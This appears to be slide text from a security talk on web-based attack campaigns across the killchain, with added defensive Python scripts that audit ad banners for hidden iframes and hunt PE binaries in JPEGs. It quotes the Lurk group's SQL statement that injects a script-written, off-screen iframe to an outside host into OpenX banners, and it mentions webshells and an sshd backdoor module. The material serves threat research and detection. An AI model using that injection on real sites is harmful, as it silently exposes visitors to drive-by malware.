Fyodor Yarochkin, Vladimir Kropotov, TrendMicro FTR
Web As Ongoing Threat Vector: Case Studies from Europe and Asia Pacific
Introduction
So how is the web being used and abused?
The trivial: drive-bys, EKs... but there is much more than this
Software gets smarter, users become .. the opposite ;)
With or without YOU...
Penetration and Data Exfil. Campaigns
These seem to leverage web for all steps of traditional killchain:
• recon: social lures, system fingerprinting, targeted delivery of first stage payloads
• exploitation: exploits, social engineering tricks, phishing
• c2: compromised sites, proxies, social network websites
• data exfiltration: cloud services are often used for data exfil to mimic user behaviors
Out of scope
• We will not talk about trivial stuff here.
• We will not talk about Denial of Service attacks, except for unusual trends.
• We expect everybody in the room knows what Exploit Kits and Drive-by-Download attacks are.
• Focus on lesser-known but important cases and situations
Censorship will save the future :)
Side effects of Internet Censorship
Infrastructure compromise could lead to bad impacts
Blacklisted domains resolve to “arbitrary” sites
Github incident
GosKomNadzor (blacklisting)
dymoff.space
How to kill a site on a country-wide scale
The Killchain
The common concept is that the Web is used during the exploitation process. The reality is that we’ve seen use of web systems across the whole killchain.
SMART
Killchain: Reconnaissance
Fingerprinting: Scanbox-like techniques
Discussed: http://pwc.blogs.com/cyber_security_updates/2014/10/scanbox-framework-whos-affected-and-whos-using-it-1.html
Also by TombKeeper in 2013
Reconnaissance tools
Non Violent environment fingerprinting actions
Flash case from Lurk:
Recon with multi-staged payloads
Killchain: delivery and exploitation
Web portals as a threat vector
• Initial vectors of compromise in targeted attacks (map pentest and APT scenarios)
• Misconfigurations and their consequences (unpredicted data leaks)
• Exfiltration as a customer communication (hypothetical, but maybe already in the wild)
• BPC or Business logic compromises
Anti-forensic in early days
Delivery on non-standard ports
Watering Hole as a threat vector
credit: Joseph C Chen
Caching routines as a threat vector (Lurk Case 1)
• memcached cache poisoning
• Observed: continuous flood of connection requests to TCP 11211 (default memcached port)
• Cached pages were updated with ‘iframed’ versions of these pages on the fly
SSH Vuln as a threat vector (Lurk Case 2)
• Machine was compromised via an ssh vulnerability
• Apache web server had an additional module installed: mod_proxy_mysql.so (didn’t link any mysql libraries)
• This is possibly a modified version of http://pastebin.com/raw/6wWVsstj as reported by Sucuri (https://blog.sucuri.net/2013/01/server-side-iframe-injections-via-apache-modules-and-sshd-backdoor.html)
OpenX as a threat vector (Lurk Case 3)
OpenX compromise
• webshell installed
• The Lurk group periodically modified banners table with:
update `banners` set htmltemplate=concat(htmltemplate, '<script>document.write(\'<div style="position:absolute;left:1000px;top:-1280px;"><iframe src="http://couldvestuck.org/XZAH"></iframe></div>\');</script>') where storagetype='html'
• This causes the OpenX script ‘/www/delivery/ajs.php’ to produce the HTML code with this iframe snippet appearing at the page.
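An added detection example (not from the slides or from OpenX): it audits stored HTML, such as `htmltemplate` values from the banners table here or page bodies pulled from memcached in Lurk Case 1, for iframes pointing at hosts outside an allow-list, and notes whether they sit in an off-screen wrapper or are emitted by script. The row ids, allow-list and first, second and fourth sample rows are constructed; the third row appends the snippet quoted above.

```python
import re
from urllib.parse import urlparse

SCRIPT_RE = re.compile(r"<script\b[^>]*>.*?</script>", re.I | re.S)
# The src quote may itself be backslash-escaped when the tag lives in a JS string
IFRAME_RE = re.compile(r"<iframe\b[^>]*?\bsrc\s*=\s*\\?[\"']?([^\"'\\\s>]+)", re.I)
ABS_STYLE_RE = re.compile(r"position\s*:\s*absolute[^\"'>]*", re.I)
OFFSET_RE = re.compile(r"\b(?:left|top)\s*:\s*(-?\d+)\s*px", re.I)


def audit_template(html, allowed_hosts):
    """Return one finding per iframe whose host is not allow-listed."""
    script_spans = [m.span() for m in SCRIPT_RE.finditer(html)]
    findings = []
    for m in IFRAME_RE.finditer(html):
        host = (urlparse(m.group(1)).hostname or "").lower()
        if not host or host in allowed_hosts:
            continue  # relative (same-origin) or expected ad host
        # Look just before the iframe for an absolutely positioned wrapper
        window = html[max(0, m.start() - 200):m.start()]
        offsets = [int(v) for style in ABS_STYLE_RE.findall(window)
                   for v in OFFSET_RE.findall(style)]
        findings.append({
            "host": host,
            "offscreen": any(v < 0 for v in offsets),
            "via_script": any(a <= m.start() < b for a, b in script_spans),
        })
    return findings


def scan_banners(rows, allowed_hosts):
    """rows: iterable of (row_id, html). Returns {row_id: findings} for hits only."""
    report = {}
    for row_id, html in rows:
        findings = audit_template(html, allowed_hosts)
        if findings:
            report[row_id] = findings
    return report


# Constructed sample data (hypothetical ids and hosts)
ALLOWED_HOSTS = {"ads.example.com"}
CLEAN = '<a href="https://ads.example.com/c/1"><img src="https://ads.example.com/b1.png"></a>'
INJECTED = ("<script>document.write('<div style=\"position:absolute;left:1000px;"
            "top:-1280px;\"><iframe src=\"http://couldvestuck.org/XZAH\"></iframe>"
            "</div>');</script>")
SAMPLE_ROWS = [
    (1, CLEAN),
    (2, '<iframe src="https://ads.example.com/frame/2" width="300"></iframe>'),
    (3, CLEAN + INJECTED),
    (4, '<iframe src="https://cdn.partner.example/w.html"></iframe>'),
]

if __name__ == "__main__":
    for row_id, findings in scan_banners(SAMPLE_ROWS, ALLOWED_HOSTS).items():
        print(row_id, findings)
```

Row 4 is reported as well, but with both flags false, which separates an unreviewed third-party frame from the hidden, script-written kind.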
EK Evolution mostly focused on Usability and Antiforensics
• Serve where you can
• Serve by IP once per day
• Include GEO specifics
• Serve during intervals
• Serve for appropriate browser
• Serve in appropriate environment
• ...
ADD Period Abuse
Exploiting trusted redirects
Killchain: Command And Control
social networks are widely utilized as intermediate c2
Telegram as c2
Legit and non legit use
• C2 on compromised web sites (Korea case and many others)
• Major objectives
  – Adds extra layer of obfuscation
  – Minimize untrusted connections issues
Steganography
Hunting for MZ (PE binaries) inside .jpg files
Saumil did an awesome job exploring the boundaries: Stegosploit
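An added example of the MZ hunt (not the presenters' tooling): it walks the JPEG segment structure to find the end-of-image marker, then reports every `MZ` whose `e_lfanew` field points at a `PE\0\0` signature, so a stray "MZ" in compressed image data is not flagged. It covers only PE bytes stored as-is in the file, not data encoded into pixel values; the sample image and PE stub are constructed.

```python
import struct


def find_eoi(data):
    """Offset just past the JPEG EOI marker, or None if the structure is not JPEG."""
    if data[:2] != b"\xff\xd8":              # SOI
        return None
    pos = 2
    while pos + 4 <= len(data):
        if data[pos] != 0xFF:
            return None
        marker = data[pos + 1]
        seglen = struct.unpack(">H", data[pos + 2:pos + 4])[0]
        pos += 2 + seglen                    # skip the segment, embedded thumbnails included
        if marker == 0xDA:                   # SOS: entropy-coded data follows
            end = data.find(b"\xff\xd9", pos)
            return None if end < 0 else end + 2
    return None


def find_pe_headers(data):
    """Offsets of 'MZ' whose e_lfanew (at +0x3C) points to a 'PE\\0\\0' signature."""
    hits, pos = [], data.find(b"MZ")
    while pos >= 0:
        if pos + 0x40 <= len(data):
            e_lfanew = struct.unpack_from("<I", data, pos + 0x3C)[0]
            pe = pos + e_lfanew
            if 0x40 <= e_lfanew <= 0x1000 and data[pe:pe + 4] == b"PE\0\0":
                hits.append(pos)
        pos = data.find(b"MZ", pos + 1)
    return hits


def hunt(data):
    """List validated PE headers and whether each lies after the image ends."""
    eoi = find_eoi(data)
    return [{"offset": off, "after_eoi": eoi is not None and off >= eoi}
            for off in find_pe_headers(data)]


def make_sample_jpeg():
    # Constructed: SOI, APP0, SOS, five scan bytes containing a decoy "MZ", EOI
    app0 = b"\xff\xe0" + struct.pack(">H", 16) + b"JFIF\0" + bytes(9)
    sos = b"\xff\xda" + struct.pack(">H", 8) + bytes(6)
    return b"\xff\xd8" + app0 + sos + b"\x12\x34MZ\x56" + b"\xff\xd9"


def make_pe_stub():
    # Constructed: DOS header with e_lfanew = 0x40, then the PE signature
    return b"MZ" + bytes(0x3A) + struct.pack("<I", 0x40) + b"PE\0\0" + bytes(20)


SAMPLE_CLEAN = make_sample_jpeg()
SAMPLE_STEGO = SAMPLE_CLEAN + make_pe_stub()

if __name__ == "__main__":
    print(hunt(SAMPLE_CLEAN), hunt(SAMPLE_STEGO))
```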
Persistence: awesomeness of simplicity
Killchain: Action
Ransomware attacks on server side web application
•All your data belongs to us
Cloud Exfiltration
Client side web application as a threat vector
Maybe extend attack surface to open redirect,
• open redirect
• SSRF
• Phishing forms
• EK
And make an introduction and focus on interesting EK cases
Tips on Detection
•Defence Action plan for CSIRT teams
Small things matter: investigate
Other interesting artifacts of Web Exploitation
Exploit Kit Traces: ActiveX Controls
Detection and mitigation experience
• Applying IOCs for own protection
• How to tune proxies for EK mitigation
• Web as a second echelon of email attacks
  – Good case: JavaScript by email, which triggers a binary through the web
Hacker, hacker, who are you?
•VPN problem?
Strange use of F...
LEVEL 80: Persistence in the human brain - Abuse of social networks to manipulate Human Decisions